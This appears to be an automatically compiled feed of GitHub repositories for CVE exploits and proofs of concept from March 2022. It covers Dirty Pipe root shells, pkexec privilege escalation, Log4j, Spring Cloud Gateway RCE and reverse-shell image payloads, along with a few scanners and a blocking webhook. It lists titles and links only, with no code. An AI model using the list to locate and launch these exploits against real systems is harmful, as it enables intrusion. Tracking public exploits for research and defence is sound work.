**Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.** : [cryst4lliz3/CVE-2022-0824](https://github.com/cryst4lliz3/CVE-2022-0824) create time: 2022-03-22T03:49:51Z

**no description** : [Enokiy/cve-2022-22947-springcloud-gateway](https://github.com/Enokiy/cve-2022-22947-springcloud-gateway) create time: 2022-03-21T23:37:20Z

**no description** : [SivaPriyaRanganatha/CVE-2020-6418](https://github.com/SivaPriyaRanganatha/CVE-2020-6418) create time: 2022-03-21T23:05:38Z

**Reproduction of CVE-2020-36518 in Spring Boot 2.5.10** : [ghillert/boot-jackson-cve](https://github.com/ghillert/boot-jackson-cve) create time: 2022-03-21T21:13:28Z

**no description** : [yazan828/CVE-2017-1000004](https://github.com/yazan828/CVE-2017-1000004) create time: 2022-03-21T13:35:38Z

**no description** : [wy17/CVE-2022-1997](https://github.com/wy17/CVE-2022-1997) create time: 2022-03-21T15:00:48Z

**no description** : [T4t4ru/CVE-2018-16845](https://github.com/T4t4ru/CVE-2018-16845) create time: 2022-03-21T13:15:07Z

**Simple webhook to block exploitation of CVE-2022-0811** : [spiarh/webhook-cve-2022-0811](https://github.com/spiarh/webhook-cve-2022-0811) create time: 2022-03-21T09:39:22Z

**Dirty Cow CVE-2016-5195 Vulnerability** : [gurpreetsinghsaluja/dirtycow](https://github.com/gurpreetsinghsaluja/dirtycow) create time: 2022-03-21T08:35:21Z

**no description** : [Anonymous-Family/CVE-2015-1701-download](https://github.com/Anonymous-Family/CVE-2015-1701-download) create time: 2022-03-21T06:39:18Z

**no description** : [Anonymous-Family/CVE-2015-1701](https://github.com/Anonymous-Family/CVE-2015-1701) create time: 2022-03-21T06:26:21Z

**no description** : [LTiDi2000/CVE-2020-2551](https://github.com/LTiDi2000/CVE-2020-2551) create time: 2022-03-21T03:58:29Z

**pwncat module that automatically exploits CVE-2022-0847 (dirtypipe)** : [DanaEpp/pwncat_dirtypipe](https://github.com/DanaEpp/pwncat_dirtypipe) create time: 2022-03-20T23:02:43Z

**Python3 implementation of CVE 2013-0156** : [Atreb92/CVE-2013-0156](https://github.com/Atreb92/CVE-2013-0156) create time: 2022-03-20T19:22:24Z

**Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab** : [twseptian/cve-2022-24112](https://github.com/twseptian/cve-2022-24112) create time: 2022-03-20T16:35:55Z

**RCE exploit for CVE-2017-9841** : [akr3ch/CVE-2017-9841](https://github.com/akr3ch/CVE-2017-9841) create time: 2022-03-20T07:01:52Z

**CVE-2022-24990信息泄露+RCE 一条龙** : [lishang520/CVE-2022-24990](https://github.com/lishang520/CVE-2022-24990) create time: 2022-03-20T05:21:08Z

**CVE-2022-22600 Proof of Concept** : [KlinKlinKlin/MSF-screenrecord-on-MacOS](https://github.com/KlinKlinKlin/MSF-screenrecord-on-MacOS) create time: 2022-03-19T04:13:52Z

**0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020/2021 CVE-2021-2119** : [chatbottesisgmailh/Sauercloude](https://github.com/chatbottesisgmailh/Sauercloude) create time: 2022-03-20T03:17:03Z

**no description** : [mtthwstffrd/saleemrashid-sudo-cve-2019-18634](https://github.com/mtthwstffrd/saleemrashid-sudo-cve-2019-18634) create time: 2022-03-20T01:39:22Z

**CVE-2022-24086 and CVE-2022-24087 exploits proof of concept** : [Sam00rx/CVE-2022-24087](https://github.com/Sam00rx/CVE-2022-24087) create time: 2022-03-19T23:33:24Z

**Remote Code Execution in LocalStack 0.12.6** : [TheCyberGeek/CVE-2022-27251](https://github.com/TheCyberGeek/CVE-2022-27251) create time: 2022-03-19T20:49:56Z

**Documentation and proof of concept code for CVE-2022-24126.** : [tremwil/ds3-nrssr-rce](https://github.com/tremwil/ds3-nrssr-rce) create time: 2022-01-28T20:37:14Z

**CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code** : [skasanagottu57gmailv/gerhart01](https://github.com/skasanagottu57gmailv/gerhart01) create time: 2022-03-19T15:47:10Z

**WAMpage - A WebOS root LPE exploit chain (CVE-2022-23731)** : [DavidBuchanan314/WAMpage](https://github.com/DavidBuchanan314/WAMpage) create time: 2021-12-26T04:29:09Z

**PoC for CVE-2017-0075** : [belyakovvitagmailt/4B5F5F4Bp](https://github.com/belyakovvitagmailt/4B5F5F4Bp) create time: 2022-03-19T13:18:12Z

**Exploit for CVE-2021_33751 used in PWN2OWN2021** : [1N1T1A/pwn2own_exploit](https://github.com/1N1T1A/pwn2own_exploit) create time: 2022-03-19T11:39:46Z

**🎩 🤟🏻 [P1-$10,000] Google Chrome, Microsoft Edge and Opera - vulnerability reported by Maciej Pulikowski - System environment variables leak - CVE-2022-0337** : [Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera](https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera) create time: 2022-03-19T08:10:46Z

**PoC for Dirty COW (CVE-2016-5195)** : [vinspiert/scumjrs](https://github.com/vinspiert/scumjrs) create time: 2022-03-19T02:18:40Z

**PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.** : [2273852279qqs/0vercl0k](https://github.com/2273852279qqs/0vercl0k) create time: 2022-03-19T01:33:04Z

**TOP All bugbounty pentesting CVE-2022- POC Exp Things** : [hktalent/TOP](https://github.com/hktalent/TOP) create time: 2022-03-19T01:54:15Z

**CVE-2022-22600 Proof of Concept** : [acheong08/MSF-screenrecord-on-MacOS](https://github.com/acheong08/MSF-screenrecord-on-MacOS) create time: 2021-12-22T05:03:29Z

**Exploit for CVE-2022-27226** : [SakuraSamuraii/ez-iRZ](https://github.com/SakuraSamuraii/ez-iRZ) create time: 2022-03-16T17:45:12Z

**Hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn a root shell. (and attempts to restore the damaged binary as well)** : [LudovicPatho/CVE-2022-0847](https://github.com/LudovicPatho/CVE-2022-0847) create time: 2022-03-18T22:51:02Z

**Redis沙盒逃逸漏洞复现(CVE-2022-0543)** : [Newbee740/REDIS-CVE-2022-0543](https://github.com/Newbee740/REDIS-CVE-2022-0543) create time: 2022-03-18T17:15:19Z

**A Path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager Project’s Tiny File Manager <= 2.4.3 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server.** : [febinrev/CVE-2021-45010-TinyFileManager-Exploit](https://github.com/febinrev/CVE-2021-45010-TinyFileManager-Exploit) create time: 2022-03-18T14:00:03Z

**A test app to check if your device is vulnerable to CVE-2021-30955** : [GeoSn0w/Pentagram-exploit-tester](https://github.com/GeoSn0w/Pentagram-exploit-tester) create time: 2022-03-18T12:32:10Z

**CVE-2022-22947 memshell** : [viemsr/spring_cloud_gateway_memshell](https://github.com/viemsr/spring_cloud_gateway_memshell) create time: 2022-03-18T07:17:17Z

**Local privilege escalation for OS X 10.10.5 via CVE-2016-1828.** : [berritus163t/bazad5](https://github.com/berritus163t/bazad5) create time: 2022-03-18T06:59:32Z

**no description** : [tzwlhack/CVE-2017-11882](https://github.com/tzwlhack/CVE-2017-11882) create time: 2022-03-18T05:38:39Z

**CVE-2021-3156** : [RodricBr/CVE-2021-3156](https://github.com/RodricBr/CVE-2021-3156) create time: 2022-03-18T00:05:48Z

**node-ipc is malware / protestware!** : [scriptzteam/node-ipc-malware-protestware-CVE-2022-23812](https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812) create time: 2022-03-17T16:49:22Z

**Kibana <6.6.0 RCE written in python3** : [Cr4ckC4t/cve-2019-7609](https://github.com/Cr4ckC4t/cve-2019-7609) create time: 2022-03-17T15:33:33Z

**GLPI automatic exploitation tool for CVE-2020-15175** : [Xn2/GLPwn](https://github.com/Xn2/GLPwn) create time: 2022-03-14T13:51:17Z

**A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability.** : [LP-H4cmilo/CVE-2022-0847_DirtyPipe_Exploits](https://github.com/LP-H4cmilo/CVE-2022-0847_DirtyPipe_Exploits) create time: 2022-03-17T11:01:48Z

**exploits XAR – Arbitrary File Write** : [poizon-box/CVE-2022-22582](https://github.com/poizon-box/CVE-2022-22582) create time: 2022-03-17T10:16:27Z

**no description** : [Wrin9/CVE-2022-22947](https://github.com/Wrin9/CVE-2022-22947) create time: 2022-03-17T09:12:51Z

**Apache APISIX 2.12.1 Remote Code Execution by IP restriction bypass and using default admin AIP token** : [kavishkagihan/CVE-2022-24112-POC](https://github.com/kavishkagihan/CVE-2022-24112-POC) create time: 2022-03-17T08:22:54Z

**CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.** : [xigexbh/bazad1](https://github.com/xigexbh/bazad1) create time: 2022-03-17T03:38:01Z

**no description** : [Jiang59991/cve-2021-21300](https://github.com/Jiang59991/cve-2021-21300) create time: 2022-03-17T02:37:58Z

**Local Privilege Escalation (LPE) vulnerability found on Polkit's pkexec utility** : [Hifumi1337/CVE-2021-4034](https://github.com/Hifumi1337/CVE-2021-4034) create time: 2022-03-16T23:05:53Z

**A years old exploit of a local EoP vulnerability in Kingsoft Antivirus KWatch Driver version 2009.3.17.77.** : [tandasat/CVE-2022-25949](https://github.com/tandasat/CVE-2022-25949) create time: 2022-03-16T14:42:21Z

**Exploitation of CVE-2020-256480 using scapy** : [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit) create time: 2022-03-16T14:59:08Z

**IoT CVEs as abnormal events to evaluate a real-time host-based IDS. https://doi.org/10.1016/j.future.2022.03.001** : [InesMartins31/iot-cves](https://github.com/InesMartins31/iot-cves) create time: 2019-10-09T20:41:50Z

**no description** : [Jiang59991/cve-2021-21300](https://github.com/Jiang59991/cve-2021-21300) create time: 2022-03-16T13:36:02Z

**[CVE-2021-21983] VMware vRealize Operations (vROps) Manager File Path Traversal Leads to Remote Code Execution (RCE)** : [murataydemir/CVE-2021-21983](https://github.com/murataydemir/CVE-2021-21983) create time: 2022-03-16T11:56:25Z

**no description** : [pazhanivel07/frameworks_base-CVE-2021-0595](https://github.com/pazhanivel07/frameworks_base-CVE-2021-0595) create time: 2022-03-16T11:07:36Z

**no description** : [pazhanivel07/Settings-CVE-2021-0595](https://github.com/pazhanivel07/Settings-CVE-2021-0595) create time: 2022-03-16T10:59:58Z

**no description** : [Jiang59991/cve-2021-21300](https://github.com/Jiang59991/cve-2021-21300) create time: 2022-03-16T10:56:23Z

**no description** : [si1ent-le/CVE-2019-5736](https://github.com/si1ent-le/CVE-2019-5736) create time: 2022-03-16T09:22:20Z

**no description** : [Jiang59991/cve-2021-21300](https://github.com/Jiang59991/cve-2021-21300) create time: 2022-03-16T09:28:29Z

**Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability** : [p0dalirius/CVE-2021-43008-AdminerRead](https://github.com/p0dalirius/CVE-2021-43008-AdminerRead) create time: 2021-12-13T17:26:49Z

**no description** : [sinsinology/CVE-2022-26503](https://github.com/sinsinology/CVE-2022-26503) create time: 2022-03-16T09:54:16Z

**Apache APISIX Remote Code Execution (CVE-2022-24112) proof of concept exploit** : [M4xSec/Apache-APISIX-CVE-2022-24112](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112) create time: 2022-03-16T09:19:12Z

**CVE-2022-0543_RCE,Redis Lua沙盒绕过 命令执行** : [aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543) create time: 2022-03-16T06:41:50Z

**Exploring and exploiting CVE-2022-0778.** : [BobTheShoplifter/CVE-2022-0778-POC](https://github.com/BobTheShoplifter/CVE-2022-0778-POC) create time: 2022-03-16T06:29:42Z

**Proof of concept for CVE-2022-0778, which triggers an infinite loop in parsing X.509 certificates due to a bug in BN_mod_sqrt** : [drago-96/CVE-2022-0778](https://github.com/drago-96/CVE-2022-0778) create time: 2022-03-15T19:06:33Z

**CVE-2018-11235: Git Submodule RCE** : [SenSecurity/exploit](https://github.com/SenSecurity/exploit) create time: 2022-03-15T17:33:22Z

**no description** : [W0rty/CVE-2021-39165](https://github.com/W0rty/CVE-2021-39165) create time: 2022-03-15T18:14:46Z

**Simple python script to exploit Vsftpd 2.3.4 Backdoor Command Execution (CVE-2011-2523)** : [PrestaDZ/vsftpd-2.3.4](https://github.com/PrestaDZ/vsftpd-2.3.4) create time: 2022-03-15T13:39:19Z

**no description** : [dmlino/cve-2018-6574](https://github.com/dmlino/cve-2018-6574) create time: 2022-03-15T14:11:57Z

**desc_race exploit for iOS 15.0 - 15.1.1 (with stable kernel r/w primitives) (CVE-2021-30955)** : [Dylbin/desc_race](https://github.com/Dylbin/desc_race) create time: 2022-03-15T13:30:38Z

**Python script to check if your kernel is vulnerable to Dirty pipe CVE-2022-0847** : [MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker](https://github.com/MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker) create time: 2022-03-15T11:25:19Z

**no description** : [bysinks/CVE-2021-29441](https://github.com/bysinks/CVE-2021-29441) create time: 2022-03-15T08:53:59Z

**no description** : [phuonguno98/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/phuonguno98/CVE-2022-0847-DirtyPipe-Exploits) create time: 2022-03-15T08:54:38Z

**no description** : [bysinks/CVE-2022-22947](https://github.com/bysinks/CVE-2022-22947) create time: 2022-03-15T08:50:13Z

**no description** : [githublihaha/DirtyPIPE-CVE-2022-0847](https://github.com/githublihaha/DirtyPIPE-CVE-2022-0847) create time: 2022-03-15T08:33:19Z

**no description** : [Mani1325/ka-cve-2021-21341](https://github.com/Mani1325/ka-cve-2021-21341) create time: 2022-03-15T07:28:52Z

**no description** : [phuonguno98/CVE-2022-0847](https://github.com/phuonguno98/CVE-2022-0847) create time: 2022-03-15T06:06:31Z

**Proof of concept app for Android permanent denial-of-service vulnerability, CVE-2020-0443** : [Supersonic/CVE-2020-0443](https://github.com/Supersonic/CVE-2020-0443) create time: 2022-03-15T04:54:31Z

**no description** : [k0zulzr/CVE-2022-24086-RCE](https://github.com/k0zulzr/CVE-2022-24086-RCE) create time: 2022-03-15T05:11:23Z

**pkexec --> privilege escalation** : [TomSgn/CVE-2021-4034](https://github.com/TomSgn/CVE-2021-4034) create time: 2022-03-14T22:42:49Z

**Implementation of CVE-2022-0847 as a shellcode** : [Shotokhan/cve_2022_0847_shellcode](https://github.com/Shotokhan/cve_2022_0847_shellcode) create time: 2022-03-14T22:54:15Z

**CVE-2022-24122 Proof of Concept** : [meowmeowxw/CVE-2022-24122](https://github.com/meowmeowxw/CVE-2022-24122) create time: 2022-03-10T15:20:04Z

**Exploit for the Rails CVE-2019-5420** : [trickstersec/CVE-2019-5420](https://github.com/trickstersec/CVE-2019-5420) create time: 2022-03-14T17:29:47Z

**PoC for CVE-2021-33193** : [jeremy-cxf/CVE-2021-33193](https://github.com/jeremy-cxf/CVE-2021-33193) create time: 2022-03-14T17:30:22Z

**no description** : [Fa1c0n35/CVE-2021-41773](https://github.com/Fa1c0n35/CVE-2021-41773) create time: 2022-03-14T16:43:49Z

**Exploits for Hotel Druid 3.0.3 - Remote Code Execution (RCE) CVE-2022-22909** : [kaal18/CVE-2022-22909](https://github.com/kaal18/CVE-2022-22909) create time: 2022-03-14T17:10:08Z

**CVE-2022-0847 POC** : [breachnix/dirty-pipe-poc](https://github.com/breachnix/dirty-pipe-poc) create time: 2022-03-14T15:32:25Z

**no description** : [p0ch4t/CVE-2022-0867](https://github.com/p0ch4t/CVE-2022-0867) create time: 2022-03-14T14:19:28Z

**dirtypipe** : [CYB3RK1D/CVE-2022-0847](https://github.com/CYB3RK1D/CVE-2022-0847) create time: 2022-03-14T13:21:25Z

**CVE-2021-30955 iOS 15.1.1 POC for 6GB RAM devices (A14-A15)** : [markie-dev/desc_race_A15](https://github.com/markie-dev/desc_race_A15) create time: 2022-03-14T06:42:45Z

**Oracle Access Manager Unauthenticated Attacker Vulnerability CVE-2021-35587** : [antx-code/CVE-2021-35587](https://github.com/antx-code/CVE-2021-35587) create time: 2022-03-14T05:03:54Z

**no description** : [cryst4lliz3/CVE-2021-44228-vuln-app](https://github.com/cryst4lliz3/CVE-2021-44228-vuln-app) create time: 2022-03-14T04:13:13Z

**no description** : [cryst4lliz3/CVE-2021-44228](https://github.com/cryst4lliz3/CVE-2021-44228) create time: 2022-03-14T04:09:36Z

**no description** : [cryst4lliz3/CVE-2021-22205](https://github.com/cryst4lliz3/CVE-2021-22205) create time: 2022-03-14T04:09:18Z

**no description** : [cryst4lliz3/CVE-2021-41773](https://github.com/cryst4lliz3/CVE-2021-41773) create time: 2022-03-14T04:08:56Z

**no description** : [cryst4lliz3/CVE-2021-42013](https://github.com/cryst4lliz3/CVE-2021-42013) create time: 2022-03-14T04:08:24Z

**OPEN AND READ JSON** : [StepOK10/CVE.NVD.NIST2202-2002](https://github.com/StepOK10/CVE.NVD.NIST2202-2002) create time: 2022-03-13T21:01:21Z

**CVE-2021-4034 (PWNKIT). A memory corruption vulnerability in Polkit's pkexec, which allows any unprivileged user to gain full root privileges on a vulnerable system using default polkit configuration.** : [Nel0x/pwnkit-vulnerability](https://github.com/Nel0x/pwnkit-vulnerability) create time: 2022-03-13T20:24:59Z

**Dirty Pipe (CVE-2022-0847) zafiyeti kontrolü** : [realbatuhan/dirtypipetester](https://github.com/realbatuhan/dirtypipetester) create time: 2022-03-13T19:30:14Z

**no description** : [micha3lcve/LOG4J-mass-rce-CVE-2021-44228](https://github.com/micha3lcve/LOG4J-mass-rce-CVE-2021-44228) create time: 2022-03-13T15:23:49Z

**spring-cloud-gateway-rce CVE-2022-22947** : [k3rwin/spring-cloud-gateway-rce](https://github.com/k3rwin/spring-cloud-gateway-rce) create time: 2022-03-13T10:00:21Z

**no description** : [Kashiki078/CVE-2021-4034](https://github.com/Kashiki078/CVE-2021-4034) create time: 2022-03-13T07:40:56Z

**CVE-2022-0847 (Dirty Pipe) is an arbitrary file overwrite vulnerability that allows escalation of privileges by modifying or overwriting arbitrary read-only files e.g. /etc/passwd, /etc/shadow.** : [sa-infinity8888/Dirty-Pipe-CVE-2022-0847](https://github.com/sa-infinity8888/Dirty-Pipe-CVE-2022-0847) create time: 2022-03-13T05:51:06Z

**Apache2 2.4.49 - LFI & RCE Exploit - CVE-2021-41773** : [thehackersbrain/CVE-2021-41773](https://github.com/thehackersbrain/CVE-2021-41773) create time: 2022-03-12T21:24:55Z

**A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability.** : [AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) create time: 2022-03-12T20:57:24Z

**my personal exploit of CVE-2022-0847(dirty pipe)** : [arttnba3/CVE-2022-0847](https://github.com/arttnba3/CVE-2022-0847) create time: 2022-03-12T11:31:46Z

**Small PoC of CVE-2021-41773** : [the29a/CVE-2021-41773](https://github.com/the29a/CVE-2021-41773) create time: 2022-03-11T21:50:35Z

**Script en python para crear imagenes maliciosas (reverse shell)** : [GatoGamer1155/CVE-2021-22204](https://github.com/GatoGamer1155/CVE-2021-22204) create time: 2022-03-11T19:02:28Z

**Seowon SLR-120S42G RCE Exploit / Remote Code Execution (Unauthenticated)** : [TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated) create time: 2022-03-11T00:16:35Z

**Script en python para crear imagenes maliciosas (reverse shell)** : [GatoGamer1155/CVE-2021-22204](https://github.com/GatoGamer1155/CVE-2021-22204) create time: 2022-03-11T17:31:07Z

**no description** : [frarinha/CVE-2018-6574](https://github.com/frarinha/CVE-2018-6574) create time: 2022-03-11T13:40:22Z

**LPE on linux kernel based on CVE-2017-14954, CVE-2017-18344, CVE-2017-5123** : [echo-devim/exploit_linux_kernel4.13](https://github.com/echo-devim/exploit_linux_kernel4.13) create time: 2022-03-11T12:54:10Z

**MSF Module CVE-2018-15727** : [svnsyn/CVE-2018-15727](https://github.com/svnsyn/CVE-2018-15727) create time: 2022-03-11T13:20:19Z

**Log4j2组件命令执行RCE / Code By:Jun_sheng** : [Jun-5heng/CVE-2021-44228](https://github.com/Jun-5heng/CVE-2021-44228) create time: 2022-03-11T12:43:15Z

**no description** : [sakib570/CVE-2018-1263-Demo](https://github.com/sakib570/CVE-2018-1263-Demo) create time: 2022-03-11T12:07:16Z

**Log4j2组件命令执行RCE / Code By:Jun_sheng** : [Jun-5heng/CVE-2021-44228](https://github.com/Jun-5heng/CVE-2021-44228) create time: 2022-03-11T10:08:12Z

**A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell** : [crusoe112/DirtyPipePython](https://github.com/crusoe112/DirtyPipePython) create time: 2022-03-11T08:22:56Z

**CVE-2022-0492 EXP and Analysis write up** : [chenaotian/CVE-2022-0492](https://github.com/chenaotian/CVE-2022-0492) create time: 2022-03-11T08:02:46Z

**no description** : [dskmehra/CVE-2022-0848](https://github.com/dskmehra/CVE-2022-0848) create time: 2022-03-11T07:26:04Z

**MetaBase 任意文件读取** : [Chen-ling-afk/CVE-2021-41277](https://github.com/Chen-ling-afk/CVE-2021-41277) create time: 2022-03-11T06:39:38Z

**no description** : [Greetdawn/CVE-2022-0847-DirtyPipe-](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe-) create time: 2022-03-11T02:51:54Z

**cve-2022-22947-docker** : [hh-hunter/cve-2022-22947-docker](https://github.com/hh-hunter/cve-2022-22947-docker) create time: 2022-03-11T01:27:55Z

**no description** : [VVeakee/CVE-2022-24990-EXP](https://github.com/VVeakee/CVE-2022-24990-EXP) create time: 2022-03-11T01:06:26Z

**CVE-2022-0847 Python exploit to get root or write a no write permission, immutable or read-only mounted file.** : [terabitSec/dirtyPipe-automaticRoot](https://github.com/terabitSec/dirtyPipe-automaticRoot) create time: 2022-03-10T20:15:07Z

**About Script en python sobre la vulnerabilidad CVE-2021-3156** : [GatoGamer1155/CVE-2021-3156](https://github.com/GatoGamer1155/CVE-2021-3156) create time: 2022-03-10T19:10:28Z

**no description** : [michaelklaan/CVE-2022-0847-Dirty-Pipe](https://github.com/michaelklaan/CVE-2022-0847-Dirty-Pipe) create time: 2022-03-10T16:09:16Z

**no description** : [michaelklaan/CVE-2022-22947-Spring-Cloud](https://github.com/michaelklaan/CVE-2022-22947-Spring-Cloud) create time: 2022-03-10T16:08:23Z

**HERRAMIENTA AUTOMATIZADA PARA LA DETECCION DE LA VULNERABILIDAD CVE-2021-44228** : [MiguelM001/vulescanjndilookup](https://github.com/MiguelM001/vulescanjndilookup) create time: 2022-03-10T14:57:30Z

**CVE-2022-0847 Linux kernel LPE POC** : [akecha/Dirty-pipe](https://github.com/akecha/Dirty-pipe) create time: 2022-03-10T14:02:30Z

**CVE-2022-0847-DirtyPipe-Exploit** : [V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit) create time: 2022-03-10T13:23:52Z

**no description** : [mohamedimthiyaj/cve-2018](https://github.com/mohamedimthiyaj/cve-2018) create time: 2022-03-10T11:20:39Z

**no description** : [ByteHackr/CVE-2022-0853](https://github.com/ByteHackr/CVE-2022-0853) create time: 2022-03-10T09:10:56Z

**no description** : [PaoPaoLong-lab/Spring-CVE-2022-22947-](https://github.com/PaoPaoLong-lab/Spring-CVE-2022-22947-) create time: 2022-03-10T06:01:32Z

**CVE-2021-44228 in Container** : [cryst4lliz3/CVE-2021-44228](https://github.com/cryst4lliz3/CVE-2021-44228) create time: 2022-03-10T04:32:07Z

**no description** : [PaoPaoLong-lab/Spring-Cloud-Gateway-CVE-2022-22947-](https://github.com/PaoPaoLong-lab/Spring-Cloud-Gateway-CVE-2022-22947-) create time: 2022-03-10T05:07:59Z

**CVE-2022-22947 Exploit script** : [An0th3r/CVE-2022-22947-exp](https://github.com/An0th3r/CVE-2022-22947-exp) create time: 2022-03-10T03:51:47Z

**仅仅是poc,并不是exp** : [VVeakee/CVE-2022-24990-POC](https://github.com/VVeakee/CVE-2022-24990-POC) create time: 2022-03-10T03:16:04Z

**no description** : [babyshen/CVE-2019-13272](https://github.com/babyshen/CVE-2019-13272) create time: 2022-03-10T01:27:46Z

**CVE-2022-0847 POC and Docker and Analysis write up** : [chenaotian/CVE-2022-0847](https://github.com/chenaotian/CVE-2022-0847) create time: 2022-03-10T01:27:29Z

**no description** : [edsonjt81/CVE-2021-4034-Linux](https://github.com/edsonjt81/CVE-2021-4034-Linux) create time: 2022-03-10T01:24:14Z

**no description** : [edsonjt81/CVE-2022-0847-Linux](https://github.com/edsonjt81/CVE-2022-0847-Linux) create time: 2022-03-10T01:18:26Z

**A root exploit for CVE-2022-0847 (Dirty Pipe)** : [babyshen/CVE-2022-0847](https://github.com/babyshen/CVE-2022-0847) create time: 2022-03-10T00:54:11Z

**Exploits CVE-2022-22588 vulnerability on iOS 15.2 and lower. Provided for research purposes only.** : [trevorspiniolas/homekitdos](https://github.com/trevorspiniolas/homekitdos) create time: 2022-01-01T07:38:48Z

**no description** : [T4t4ru/CVE-2022-0847](https://github.com/T4t4ru/CVE-2022-0847) create time: 2022-03-09T16:47:36Z

**Dirty Pipe POC** : [gyaansastra/CVE-2022-0847](https://github.com/gyaansastra/CVE-2022-0847) create time: 2022-03-09T15:44:58Z

**ThinkAdmin CVE-2020-25540 POC** : [Rajchowdhury420/ThinkAdmin-CVE-2020-25540](https://github.com/Rajchowdhury420/ThinkAdmin-CVE-2020-25540) create time: 2022-03-09T13:08:31Z

**Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well)** : [nanaao/Dirtypipe-exploit](https://github.com/nanaao/Dirtypipe-exploit) create time: 2022-03-09T07:16:57Z

**no description** : [pentestblogin/pentestblog-CVE-2022-0847](https://github.com/pentestblogin/pentestblog-CVE-2022-0847) create time: 2022-03-09T10:24:42Z

**no description** : [qjh2333/CVE-2019-10999](https://github.com/qjh2333/CVE-2019-10999) create time: 2022-03-09T09:35:15Z

**no description** : [AyoubNajim/cve-2022-0847dirtypipe-exploit](https://github.com/AyoubNajim/cve-2022-0847dirtypipe-exploit) create time: 2022-03-09T10:05:53Z

**Polkit's Pkexec CVE-2021-4034 Proof Of Concept and Patching** : [ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034](https://github.com/ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034) create time: 2022-03-09T08:44:02Z

**no description** : [Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit) create time: 2022-03-09T05:22:20Z

**Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well)** : [MRNIKO1/Dirtypipe-exploit](https://github.com/MRNIKO1/Dirtypipe-exploit) create time: 2022-03-09T04:42:59Z

**no description** : [tuo4n8/CVE-2020-28653](https://github.com/tuo4n8/CVE-2020-28653) create time: 2021-07-31T13:00:15Z

**CVE-2022-0847** : [Al1ex/CVE-2022-0847](https://github.com/Al1ex/CVE-2022-0847) create time: 2022-03-09T02:47:08Z

**no description** : [Greetdawn/CVE-2022-0847-DirtyPipe](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe) create time: 2022-03-09T02:47:06Z

**Springboot web application accepts a name get parameter and logs its value to log4j2. Vulnerable to CVE-2021-44228.** : [paulvkitor/log4shellwithlog4j2_13_3](https://github.com/paulvkitor/log4shellwithlog4j2_13_3) create time: 2022-03-09T02:29:58Z

**no description** : [bakhtiyarsierad/CVE-2021-4034-bug-root](https://github.com/bakhtiyarsierad/CVE-2021-4034-bug-root) create time: 2022-03-09T02:04:07Z

**A “Dirty Pipe” vulnerability with CVE-2022-0847 and a CVSS score of 7.8 has been identified, affecting Linux Kernel 5.8 and higher. The vulnerability allows attackers to overwrite data in read-only files. Threat actors can exploit this vulnerability to privilege themselves with code injection.** : [dadhee/CVE-2022-0847_DirtyPipeExploit](https://github.com/dadhee/CVE-2022-0847_DirtyPipeExploit) create time: 2022-03-09T01:55:04Z

**This script exploits CVE-2021-41773 to print file or/and execute command.** : [mauricelambert/CVE-2021-41773](https://github.com/mauricelambert/CVE-2021-41773) create time: 2022-03-08T21:55:53Z

**This script exploits CVE-2021-42013 to print file or/and execute command.** : [mauricelambert/CVE-2021-42013](https://github.com/mauricelambert/CVE-2021-42013) create time: 2022-03-08T21:48:40Z

**Script en python sobre la vulnerabilidad CVE-2021-3560** : [GatoGamer1155/CVE-2021-3560](https://github.com/GatoGamer1155/CVE-2021-3560) create time: 2022-03-08T20:27:00Z

**Script en python sobre la vulnerabilidad CVE-2021-4034** : [GatoGamer1155/CVE-2021-4034](https://github.com/GatoGamer1155/CVE-2021-4034) create time: 2022-03-08T20:12:38Z

**CVE-2022-0847** : [4luc4rdr5290/CVE-2022-0847](https://github.com/4luc4rdr5290/CVE-2022-0847) create time: 2022-03-08T20:18:28Z

**no description** : [chompie1337/Linux_LPE_io_uring_CVE-2021-41073](https://github.com/chompie1337/Linux_LPE_io_uring_CVE-2021-41073) create time: 2022-03-02T19:07:37Z

**A script to exploit CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks** : [p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce) create time: 2022-03-08T17:14:27Z

